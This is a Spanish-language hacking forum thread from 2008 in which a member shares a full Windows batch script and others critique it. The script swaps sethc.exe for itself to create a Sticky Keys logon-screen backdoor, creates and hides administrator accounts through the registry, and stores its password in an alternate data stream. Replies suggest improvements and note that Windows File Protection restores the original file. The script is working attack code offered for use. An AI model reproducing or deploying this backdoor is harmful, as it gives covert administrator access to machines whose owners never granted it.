Escalador de Privilegios - by

Este es el code mas o menos que tengo para el escalador de privilegios que queria aportar para la version de Windows de el-hacker...

Quisiera que lo analizaran y me dijeran los posibles errores y mejoras, para que esta tambien llegue a ser una gran utilidad.. Cheesy

Codigo:

Código:

mode con cols=70
mode con lines=20
   @echo off
title Comunidad UnderGround Hispana - Escalador de Privilegios
color 0a

if exist "%windir%\system32\sethc.lz0" (goto load) else (goto ins)

:ins
echo.
echo Aun no se ha modificado el Sistema..
echo.
echo Presione una Tecla para realizar el Procedimiento, o salga
echo del programa si lo desea...
pause > nul
copy "%windir%\system32\sethc.exe" "%windir%\system32\sethc.lz0"
del /f "%windir%\system32\sethc.exe"
copy %0 "%windir%\system32\sethc.exe"
echo ni7vtyk3t3hd2mkniyk3t3hd2mhd2mt3>>"%windir%\system32\shell32.dll:admin.cuh"
cls
echo.
echo   ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo   º El cambio del archivo del Sistema usado para º
echo   º la Escalada de privilegios se ha realizado   º
echo   º satisfactoriamente, tendra efecto la proxima º
echo   º vez que vaya a Iniciar sesion...    º
echo   ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo.
echo Desea ver la Ayuda del Programa: Si [s] No [N]
echo.
set /p opc="> "
if %opc%==s call :help 2
if %opc%==S call :help 2
if %opc%==n (echo.&echo Gracias por Usar este Programa&pause&exit)
if %opc%==N (echo.&echo Gracias por Usar este Programa&pause&exit)

:load
cls
for /F "tokens=*" %%a in (%windir%\system32\shell32.dll:admin.cuh) do set conf=%%a
echo.
echo    ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo    º Escalada de Privilegios - CUH el-hacker.com º
echo    ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo.
echo. El Programa se encuentra Protegido
echo. Por Favor Introduzca su Clave!
set /p q="Password > "
call :cript %q%
if %v%==%conf% (goto ini) else (cls&echo.&echo Clave Invalida...&echo.&echo Vuelva a Intentarlo&pause&goto load)

:ini
cls
echo.
echo    ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo    º Escalada de Privilegios - CUH el-hacker.com º
echo    ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo.
echo Elija una Opcion:
echo.
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³1³ ³ Agregar un Usuario.. ³ ³2³ ³ Esconder un usuario. ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³3³ ³ Eliminar un Usuario. ³ ³4³ ³ Ver Ayuda - Creditos ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³5³ ³ Salir del Programa. ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo.
set /p opc="> "
if "opc"=="" (goto :ini)
set opc=%opc: =_%
set opc=%opc:&=_%
set opc=%opc:¡=_%

if %opc%==1 goto addadmin
if %opc%==2 goto hideuser
if %opc%==5 goto fin
if %opc%==4 call :help 1
if %opc%==3 (goto :delete) else (goto :err)

:err
cls
echo.
echo ERROR...
echo.
echo No ha escogido una Opcion Correcta
echo Vuelva a Intentarlo
echo.
pause
goto ini

:addadmin
cls
echo.
echo   ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo Escriba el Nombre del Nuevo usuario
echo   ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p admin="> "
echo.
echo Escriba el la Clave para el Usuario: %admin%
echo.
set /p clave="> "
net user "%admin%" "%clave%" /add
net localgroup Administradores %admin% /add
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º    Usuario Agregado Con Exito    º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
pause >nul
goto ini

:delete
cls
echo.
echo Escriba El Nombre Del Usuario a Borrar:
echo.
set /p usdel="> "
net user "%usdel%" /delete
cls
echo.
echo Usuario Borrado Con Exito.
echo.
pause
goto ini

:hideuser
echo.
echo Escrilba la Cuenta o Nombre de Usuario
echo que desea esconder de la pantalla de
echo Inico de Sesion...
echo.
set /p hiden="> "
reg add "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccount\UserList" /v "%hidden%" /t REG_DWORD /d 0 /f
echo.
echo El Usuario %hidden% fue Ocultado con Exito...
echo.
pause
goto ini

:help
cls
echo.
echo    ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo    º Escalada de Privilegios - CUH el-hacker.com º
echo    ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo.
echo Seccion de Ayuda
echo ____________
echo ____________
echo ____________
echo ____________
echo Como se pueden dar cuenta, soy malo para las ayudas,
echo asi que podrian ayudarme ustedes...
echo.
echo   :: SmartGenius :: - powered by iSmart, Corp.
echo.
echo Presione Cualquier tecla para continuar ¡
pause > nul
if %1==1 set ir=ini
if %1==2 set ir=fin
goto %ir%

:cript
set v=%1
set v=%v:&=_%
set v=%v: =_%
set v=%v:^=_%
set v=%v:#=_%
set v=%v:-=t%
set v=%v:.=a%
set v=%v:a=23%
set v=%v:e=ni%
set v=%v:h=r%
set v=%v:r=y%
set v=%v:c=mo%
set v=%v:d=z%
set v=%v:1=+%
set v=%v:2=k%
set v=%v:b=na%
set v=%v:d=15%
set v=%v:m=t3%
set v=%v:o=sm%
set v=%v:s=hd2%
set v=%v:l=7v%
goto :eof

:fin
echo MsgBox "Gracias por usar este Programa... ;)"^&vbCrLf^&vbCrLf^&"Para mas Info visita"^&vbCrLf^&"http://foro.el-hacker.com", 64, "Escalador de Privilegios" >>%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

La clave: Adivinenla ¡¡ xD Cheesy

Edito:

ya lo he "compilado" a exe...

para que lo usen...

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Saludos.

Primer WARGAME - Reto Crackme en Batch......Participa¡¡

CUH - Malware Removal Tool....Script AntiBichos xD

Vota ¡¡ Que Marca de Movil consideras que es la Mejor ?

Tu solucion a la encriptacion es valida, pero siempre sustitulle en el mismo lugar.La condicion mas inteligente es usar el ramdom y dividirlo entre 2 si el resto da 0 haces algo y si da 1 haces otra cosa y asi consigues una encriptacion aleatoria luego vas guardando los distintos valores de resto y te quedaria un numero binario el cual puedes guardar y con el desencriptar el contenido en un proceso inverso.
Ahora podrias explicar un poco como funciona esa escalada de privilegios?

No quiero fastidiar a nadie pero eso mas que una escalada de privilegios es una bonita backdoor.

Es decir, nos permite acceder a un sistema a traves del metodo del sethc pero no es escalada de privilegios pq para que tenga exito, el programa ya ha de ser ejecutado ocn suficientes privilegios.

Pese a todo la aplicacion es buena si queremos dejar una puerta trasera en otro pc.
Seria escalada de privilegios si el sethc se modifica en un sistma en el que no tenemos privilegios, para lo cual necesitamos un live cd del knoppix o el erd commander etc...

Gracias por el aporte, acabo de mirarme ahora a simple vista lo de la password.

No parece muy complicado, aún así no la he conseguido descifrar xD tengo un problema con las "m". Voy a seguir intentandolo. Has comprobado si la pass funciona?

Bytes, Espectro Infernal.

Cita de: sami en Mayo 05, 2008, 04:16:41

No es que molestes a nadie men, todo lo contrario, son criticas constructivas Wink

, eso hace que con su ayuda pueda mejorar mis codes...

Cita de: Espectro Infernal en Mayo 05, 2008, 08:16:14

Pero claro que la pass funciona, no lo hubiera puesto de no ser asi.... lo hice porque considere que ya estaba completo, pero segun lo que he leido existen otros metodos tambien aplicables al batch por los cuales se pueden escalar privilegios....

Sea backdoor o como quieran llamarle, yo lo que queria era aportar, y que a partir de esto mejoremos el code y hagamos una tool de buena calidad...

Confio en que entre todos podemos hacerlo...

Saludos.

PD: La clave es superfacil, lo que pasa es que hay una o dos variables que cambian dos veces, y ademas esta gurdada mediante ADS...

Primer WARGAME - Reto Crackme en Batch......Participa¡¡

CUH - Malware Removal Tool....Script AntiBichos xD

Vota ¡¡ Que Marca de Movil consideras que es la Mejor ?

Ahá ya tengo el pass xD Bueno, el programa se ve bien, me gusta como hicistes los menus. Y el uso del mode:

mode con cols=70
mode con lines=20

Para dejar la ventanita en la medida exacta para que los menús queden bien encajados. Felicidades Wink

Aún así, podrías ahorrarte alguna línea si en vez de comprobar si el user escribio s o S (mayuscula o sin mayuscula) usases:

IF /I %var%=S (y servirá tanto para mayúscula como para minúscula)

Bytes, Espectro Infernal.

Cita de: Espectro Infernal en Mayo 05, 2008, 02:34:55

Bien, esto lo habia leido pero no lo habia aplicado....

Para los que no pudieron sacar la clave, solo decirles que era muy sencilla: el-hacker.com

Buneo, y como ya dije, den ideas para mejorar el programa, para hacerlo mas efectivo, yo se que esta que yo use no es la unica tecnica para escalar privilegios...

Saludos.

Primer WARGAME - Reto Crackme en Batch......Participa¡¡

CUH - Malware Removal Tool....Script AntiBichos xD

Vota ¡¡ Que Marca de Movil consideras que es la Mejor ?

Bueno, el método que usaste para encriptar la password es un poco ambiguo. Por ese mismo modo, no solo la password:

el-hacker.com

Es válida, sinó que también lo sería:

el-r23mo2er23moom

Todo depende de como vayas jugando con el flujo del código y el orden de la manipulacion de las variables. Por eso recomendaria, al usar este tipo de codificación, mirar de resolver el conflicto de diversas formas y ver si más de una password puede ser válida Wink

Bytes, Espectro Infernal.

Porcierto, me dí cuenta de que hay un pequeño error... :S Al ejecutar el programa una vez, el msgbox hecho en vbs se ejecuta correctamente. Si vuelves a iniciar el programa y a salir de el, el msgbox se ejecuta dos veces.

La tercera vez que abras el programa para usarlo y salgas de éste, el mensaje aparecerá 3 veces, y así succesivamente...

Esto lo arreglaría cambiando la línea:

echo MsgBox "Gracias por usar este Programa... Wink

"^&vbCrLf^&vbCrLf^&"Para mas Info visita"^&vbCrLf^&"
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion", 64, "Escalador de Privilegios" >>%temp%\msgr.vbs

Y ponerla así:

echo MsgBox "Gracias por usar este Programa... Wink

"^&vbCrLf^&vbCrLf^&"Para mas Info visita"^&vbCrLf^&"
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion", 64, "Escalador de Privilegios" >%temp%\msgr.vbs

De este modo, no se irán guardando en cada salida del programa instrucciones en el .vbs. Del primer modo, en cada salida del programa el archivo a ejecutar guardaba la instruccion: msgbox, y al no usar ">" y usar ">>" se ivan añadiendo msgbox al archivo vbs. De este modo se soluciona el problema.

Bytes, Espectro Infernal.

Smart puedes por favor explicar como funciona esta backdoor o como tu la llamas escalada de privilegios? Por favor

Cita de: Espectro Infernal en Mayo 06, 2008, 02:32:10

Bytes, Espectro Infernal.

Maestro

Eso es lo que queria, que lo revisaran y dieran con cositas... xD

Cita de: Espectro Infernal en Mayo 06, 2008, 02:36:11

De este error tambien me di cuenta ahora que lo estuve probando, pero no es tan grave... solo quitar un >...

Gracias por tu ayuda man...

Yo tambien me di cuenta de un posible error y es que a veces cuando borra el archivo sethc, nuestro code se copia asi mismo como este, pero despues d eunos segundos actua la proteccion de archivos de windows y reestaura el sethc original que se guarda en la dll cache..

Cita de: ECDundy en Mayo 06, 2008, 09:59:08

Smart puedes por favor explicar como funciona esta backdoor o como tu la llamas escalada de privilegios? Por favor

Este archivo lo que hace es reemplazar el archivo sethc.exe por nuestro code, asi, por ejemplo, vamos a iniciar sesion y no sabemos la clave entonces se presiona 5 veces shift y saldria la cmd (el truco original es asi)... pero mejor lo puse de esta manera para que sea mas facil agregar un usuario admin, y de igual manera ocultarlo de la pantalla de inicio...

fijate en el post de mi blog
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion...

Saludos.

Primer WARGAME - Reto Crackme en Batch......Participa¡¡

CUH - Malware Removal Tool....Script AntiBichos xD

Vota ¡¡ Que Marca de Movil consideras que es la Mejor ?

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Octubre 11, 2008, 03:12:11